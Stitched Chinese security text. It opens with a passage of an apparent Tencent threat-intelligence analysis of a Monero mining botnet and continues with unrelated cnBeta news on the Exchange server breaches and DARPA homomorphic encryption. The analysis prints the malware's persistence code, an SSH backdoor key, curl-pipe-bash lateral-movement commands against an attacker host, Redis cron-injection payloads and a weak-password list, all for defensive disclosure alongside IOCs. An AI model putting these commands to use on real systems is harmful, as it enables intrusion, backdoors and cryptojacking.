$1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % 4. 最后使用内置的URL依次下载攻击者控制的挖矿程序phpupdate、守护程序phpguard、攻击程序networkmanager并启动。 phpupdate采用开源挖矿程序XMRig编译： 持久化 1. init.sh通过安装crontab任务持久化。 if [ ! -f "/usr/bin/crontab" ] then   unlock_cron   echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1" >> ${crondir}   lock_cron else   unlock_cron   [[ $cont =~ "newdat.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1") | crontab -   lock_cron fi 2. 通过写入SSH authorized_keys公钥（留置后门）持久化。 chmod 700 /root/.ssh/       echo >> /root/.ssh/authorized_keys       chmod 600 root/.ssh/authorized_keys       echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys 3. 通过守护程序phpguard持久化 phpguard主要完成以下功能： 1） 将挖矿程序添加到Linux crontab定时任务（Windows sctasks计划任务）中并启动； 2） 通过枚举进程检查挖矿程序是否处于运行状态，如果没有则启动程序，如果挖矿程序文件不存在则重新下载和运行。 横向移动 1.init.sh通过查询本机/root/.ssh/known_hosts中的SSH登陆记录，进行免密登陆连接，然后执行远程脚本spre.sh： if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- hxxp://h.epelcdn.com/dd210131/spre.sh | bash >/dev/null 2>&1 &' & done fi 2. 直接通过执行攻击脚本spre.sh: $bbdir -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash $bbdira -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash 3. 通过Redis空口令和弱口令入侵 1）首先利用Pnscan、masscan批量扫描6379端口扫描发现Redis服务器，然后尝试进行无密码登陆，或者利用以下弱口令进行爆破登陆： redis root oracle password p@aaw0rd abc123 abc123! 123456 admin 2）Redis入侵登陆成功后，利用Redis未授权访问漏洞，在系统中写入恶意crontab任务，在任务中下载和执行恶意脚本pm.sh进行感染。 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * cdt -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wdt -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup1 "\n\n\n*/6 * * * * cd1 -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/7 * * * * wd1 -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/8 * * * * cd1 -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/9 * * * * wd1 -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'config set dir "var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat 4. 通过下载的攻击程序networkmanager进行横向移动，利用9种服务器应用的漏洞进行远程攻击，将go语言编写的木马程序networkmanager还原函数名的到如下内容： 1) Redis未授权访问漏洞； __tmp_0324_scan_exp_Redis_exploit __tmp_0324_scan_exp_re_exploit_connect_redis __tmp_0324_scan_exp_re_exploit_rce __tmp_0324_scan_exp_re_exploit_redis_brute __tmp_0324_scan_exp_re_exploit_unaurority_rce 2) Drupal RCE漏洞CVE-2018-7600； __tmp_0324_scan_exp_Drupal_exploit __tmp_0324_scan_exp_dp_7600_rce __tmp_0324_scan_exp_dp_7600_ver8_rce __tmp_0324_scan_exp_dp_7600_ver8_rce_func1 __tmp_0324_scan_exp_dp_check_payload __tmp_0324_scan_exp_dp_check_payload_func1 __tmp_0324_scan_exp_dp_isdrupal __tmp_0324_scan_exp_dp_isdrupal_func1 3) Hadoop未授权访问漏洞； __tmp_0324_scan_exp_Hadoop_exploit __tmp_0324_scan_exp_hd_exploit_unaurority_rce __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func1 __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func2 4) Spring RCE漏洞CVE-2018-1273； __tmp_0324_scan_exp_Spring_exploit __tmp_0324_scan_exp_sp_cve20181273_exists __tmp_0324_scan_exp_sp_cve20181273_exists_func1 __tmp_0324_scan_exp_sp_cve20181273_exploit __tmp_0324_scan_exp_sp_cve20181273_exploit_func1 5) Thinkphp V5高危漏洞； __tmp_0324_scan_exp_Thinkphp_exploit __tmp_0324_scan_exp_tp5_23_rce_Exists __tmp_0324_scan_exp_tp5_23_rce_Exists_func1 __tmp_0324_scan_exp_tp5_rce_Exists __tmp_0324_scan_exp_tp5_rce_Exists_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23rce __tmp_0324_scan_exp_tp_exploit_tp5rce __tmp_0324_scan_exp_tp_exploit_tp5rce_exp __tmp_0324_scan_exp_tp_exploit_tp5rce_exp_func1 __tmp_0324_scan_exp_tp_isThinkphp __tmp_0324_scan_exp_tp_isThinkphp_func1 6) WebLogic RCE漏洞CVE-2017-10271； __tmp_0324_scan_exp_Weblogic_exploit __tmp_0324_scan_exp_wl_cve201710271_rce __tmp_0324_scan_exp_wl_cve201710271_rce_func1 __tmp_0324_scan_exp_wl_cve201710271_t_rce __tmp_0324_scan_exp_wl_wls_urlistrue __tmp_0324_scan_exp_wl_wls_urlistrue_func1 7) SQLServer爆破登陆后利用xp_cmdshell、SP_OACreate执行Payload； __tmp_0324_scan_exp_Sqlserver_exploit __tmp_0324_scan_exp_ss_crack_login __tmp_0324_scan_exp_ss_execute_payload __tmp_0324_scan_exp_ss_execute_sql __tmp_0324_scan_exp_ss_exploit __tmp_0324_scan_exp_ss_exploit_sp_oacreate __tmp_0324_scan_exp_ss_exploit_xcmdshell 8) Elasticsearch远程代码执行漏洞 CVE-2015-1427、CVE-2014-3120； __tmp_0324_scan_exp_es_exploit_cve20143120_rce __tmp_0324_scan_exp_es_exploit_cve20143120_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20143120_t_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20151427_t_rce 9) CCTV设备RCE漏洞。 __tmp_0324_scan_exp_Cctv_exploit __tmp_0324_scan_exp_cc_is_shell_rce __tmp_0324_scan_exp_cc_is_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_rce __tmp_0324_scan_exp_cc_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_t_rce 三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：WebLogic, Elasticsearch等。 资源开发 注册C2服务器，利用比特币交易记录更新C2地址 初始访问 利用对外开放的WebLogic, Elasticsearch服务，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿、持久化和攻击模块 持久化 创建Crontab任务、写入SSH后门公钥，启动守护进程phpguard 横向移动 利用Redis未授权访问漏洞、SSH免密登陆、Wed应用漏洞等方法横向移动 防御规避 木马文件加壳保护，将文件命名为系统文件名并设置为系统属性 发现 通过~/.ssh/known_hosts和~/.ssh/id_rsa.pub发现入侵主机历史登录凭据，用于进一步横向移动 命令与控制 守护模块phpguard，存在动态更新C2地址，根据不同的系统下发不同的Payload、执行任意命令的功能 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 该团伙相关的威胁数据已加入腾讯安全威胁情报，已赋能给腾讯全系列安全产品，用户可以通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 推荐政企用户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙已支持拦截利用Elasticsearch漏洞发起的恶意攻击行为。 腾讯主机安全（云镜）可对病毒攻击过程中产生得木马落地文件进行自动检测，用户可后台一键隔离，删除。 私有云用户可通过腾讯高级威胁检测系统（御界）进行流量检测分析，及时发现黑客团伙的攻击活动。 腾讯高级威胁检测系统（御界）可检测到利用Elasticsearch远程代码执行漏洞CVE-2015-1427发起的恶意攻击行为。   IOCs MD5: Networkmanager 9960bac4ddc3e864a167e03037b9e65a Phpguard 35269826d788370c3be184261adde884 Phpupdate 149c79bf71a54ec41f6793819682f790 spre.sh 4da10654aeecef6c766c3352a07955de scan.sh 1b849002406d6370754c45c6b3a41e9a pm.sh 37298c13dba7a26ae068dd02225fb5b5 Domain h.epelcdn.com sh.epelcdn.com URL hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh hxxp://h.epelcdn.com/dd210131/spre.sh hxxp://h.epelcdn.com/dd210131/scan.sh hxxp://sh.epelcdn.com/dd09162/pm.sh hxxp://h.epelcdn.com/dd210131/pm.sh hxxp://176.123.7.127/id210131/phpupdate hxxp://h.epelcdn.com/dd210131/phpupdate hxxp://176.123.7.127/id210131/newdat.sh hxxp://h.epelcdn.com/dd210131/newdat.sh hxxp://176.123.7.127/id210131/config.json hxxp://h.epelcdn.com/dd210131/config.json hxxp://176.123.7.127/id210131/networkmanager hxxp://h.epelcdn.com/dd210131/networkmanager hxxp://176.123.7.127/id210131/phpguard hxxp://h.epelcdn.com/dd210131/phpguard   参考链接： https://www.freebuf.com/column/205114.html https://blogs.akamai.com/sitr/2021/02/bitcoins-blockchains-and-botnets.html https://unit42.paloaltonetworks.com/watchdog-cryptojacking/ https://s.tencent.com/research/report/1012.html    

上周五，网络安全记者布莱恩·克雷布斯（Brian Krebs）和安迪·格林伯格（Andy Greenberg）报道称，在一次前所未有的电子邮件服务器攻击中有多达 3 万个组织受到影响。不过在上周末评估的最新数据，全球有超过 6 万个微软 Exchange 服务器客户被黑客攻击，欧洲银行业管理局承认是受害者之一。 Krebs 目前已经梳理了大规模 Exchange 服务器入侵事件的基本时间表，表示微软早在今年 1 月就已意识到这些漏洞。而首个安全补丁是在将近 2 个月之后才发布的，同时官方还发布了一篇博客文章，但没有解释攻击的范围和规模。甚至于微软原本计划将该补丁放在补丁星期二活动日上推出，但鉴于漏洞影响太大，所以才提前 1 周放出。 MIT Technology Review 报道称，除了主要黑客团体 Hafnium 之外，至少有 5 个黑客团体正在利用 Exchange 服务器的漏洞。目前美国政府官员正在争分夺秒的部署措施，一位官员告诉Cyberscoop，这是“A Big F-ing Deal”。 白宫新闻秘书 Jen Psaki 称这是“一个活跃的威胁”，让人们更加关注国土安全部网络安全机构3月3日发出的紧急指令。白宫国家安全顾问杰克-沙利文也对此提出了警告，前网络安全和基础设施安全局局长克里斯托弗-克雷布斯和白宫国家安全委员会也提出了警告。 Chris Krebs 在推文中写道：“这事情大条了。如果你的组织运行一个暴露在互联网上的OWA服务器，假设在02/26-03/03之间被入侵。检查C:\\inetpub\wwwroot\aspnet_client/system_web中的8个字符aspx文件。如果你搜索到了，你就进入了事件响应模式。” 国家安全委员会在推文中写道：“ 如果服务器已经被入侵，打补丁和缓解措施并不是补救措施。任何拥有易受攻击服务器的组织必须立即采取措施，以确定它们是否已经成为目标”。         （消息来源：cnBeta；封面源自网络）  

微软和英特尔已经签署了一项协议以帮助国防高级研究计划局(DARPA)开发一种完全同态加密(FHE)解决方案，该方案将消除数据必须解密才能处理等几个薄弱环节。通过FHE，可以对加密信息进行计算，这将消除解密数据的风险，但如今要实现它需要的计算能力非常大。 为了解决这个问题，DARPA启动了虚拟环境中的数据保护（DPRIVE）计划，英特尔和微软将参与该计划，致力于开发FHE计算的硬件加速器。 据英特尔公司介绍，DPRIVE计划将由几个阶段组成，包括设计、开发和验证将用于硬件的IP块和完整的软件栈。在核心开发工作之外，两家公司将与标准机构合作，围绕FHE制定标准。英特尔表示，也将继续投入资金进行FHE技术的学术研究。 在讨论项目面临的挑战时，DARPA项目经理Tom Rondeau说：”我们目前估计，我们在FHE世界中的计算速度要比在明文世界中的计算速度慢一百万倍。DPRIVE的目标是将FHE降低到我们在明文中看到的计算速度。如果我们能够实现这一目标，同时将技术定位为规模化，DPRIVE将对我们保护和维护数据和用户隐私的能力产生重大影响。” 微软方面表示，很高兴能将其在云计算和同态加密方面的专业知识带到这里。利用英特尔的硬件专长，微软希望能够帮助开发出一种适合商业用途的技术，以弥补 “数据保密性的最后一英里差距”。         （消息及封面来源：cnBeta）

本周五，一位知情人士表示，微软（Microsoft Corp.）电子邮件软件中的一个漏洞遭黑客攻击，超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司（SolarWinds Corp）下载的所有受污染代码，该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。   美国调查记录显示，最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示，来自亚洲和欧洲的数万个组织也受到了影响。 尽管微软本周二发布了紧急补丁，但黑客攻击仍在继续。 微软最初曾表示，此次黑客攻击是“有限的、有针对性的攻击”，周五却拒绝就问题的规模置评。不过微软公司也表示正与政府机构和安全公司合作，为客户提供帮助。 此外，微软公司补充说，“受到影响的客户应联系我们的支持团队，以获得额外的帮助和资源。” 对连接设备的一次扫描显示，截至本周五，只有10%的易受攻击的设备安装了补丁，不过这一数字还在上升。 由于安装补丁并不能彻底消除漏洞，美国官员正在努力研究如何通知所有受害者，并指导他们进行黑客追捕。 所有受影响的公司似乎都在自己的机器上运行了电子邮件客户端Outlook的Web版本，而不是依赖云提供商。记录显示，后者可能会使许多大公司和联邦政府机构幸免于难。 美国联邦网络安全与基础设施安全局（Federal Cybersecurity and Infrastructure Security Agency）没有回应置评请求。 本周五早些时候，白宫新闻秘书Jen Psaki对记者表示，目前在微软广泛使用的Exchange服务器上发现的漏洞是“重大的”，且“可能产生深远的影响”。 Psaki表示：“我们担心受害者的队伍过于庞大。” 微软和参与美国回应工作的人士将第一波黑客攻击归咎于一名有中国政府背景的演员。但一名中国政府发言人表示，中国不是此次黑客入侵事件的幕后黑手。 从去年年底开始的针对几个典型间谍目标的控制性攻击，已经在上个月发展成为了一场广泛的战役。安全官员表示，这意味着除非中国改变了策略，否则第二个组织可能已经参与其中。 随着用来控制邮件服务器代码的不断传播，预计未来还会有其他黑客发起更多的攻击。 政府工作人员表示，目前黑客们只是利用漏洞重新进入并在受感染的网络中移动，这只占很小比例，可能不到十分之一。 他说：“目前有几百人正在以最快的速度利用它们，窃取数据，并安装其他方法，以便稍后返回。” 最初的攻击途径是由中国台湾知名网络研究员Cheng-Da Tsai发现的。蔡表示，他在今年1月向微软报告了这一漏洞。他在一篇博客文章中说，他正在调查信息是否泄露。 他没有回应进一步置评的请求。           （消息来源：cnBeta；封面源自网络）

微软Exchange服务器的独立安装存在一系列缺陷，这导致了一场规模庞大的网络安全事件，有几十万台Exchange服务器的安装被黑客组织Hafnium入侵。Krebs on Security报道称，大量的小企业、城镇、城市和地方政府已经被感染，黑客在盗取了数据之余还留下了一个Web Shell，以便进一步指挥和控制。 为了快速帮助潜在受害者判断和解决问题，今天，微软发布了新的工具和指南，帮助服务器管理员检测和减轻威胁。 首先最重要的是，微软发布了免费的Exchange服务器 “入侵指标”工具的更新，该工具可用于扫描Exchange服务器的日志文件，以识别它们是否受到了入侵。 下载地址： https://github.com/microsoft/CSS-Exchange/tree/main/Security 微软还发布了紧急替代缓解指南，供无法应用微软已于3月2日发布的内置独立更新的管理员使用。然而应用补丁仍然是最有效的预防措施，如果你的服务器被感染，全面补救将是一项更大的工作。 “到目前为止，我们已经处理了几十个案例，早在2月28日[微软宣布其补丁之前]，一直到现在，”发现攻击的Volexity总裁Steven Adair说。”即使你在微软公布补丁的同一天打了补丁，你的服务器上仍然很有可能存在一个web shell。事实是，如果你正在运行Exchange，而你还没有打补丁，那么你的网络组织很有可能已经被入侵。” “最好的保护是尽快在所有受影响的系统中应用更新，”微软发言人在一份书面声明中说。”我们将继续通过提供额外的调查和缓解指导来帮助客户。受影响的客户应该联系我们的支持团队，以获得额外的帮助和资源。”           （消息来源：cnBeta；封面源自网络）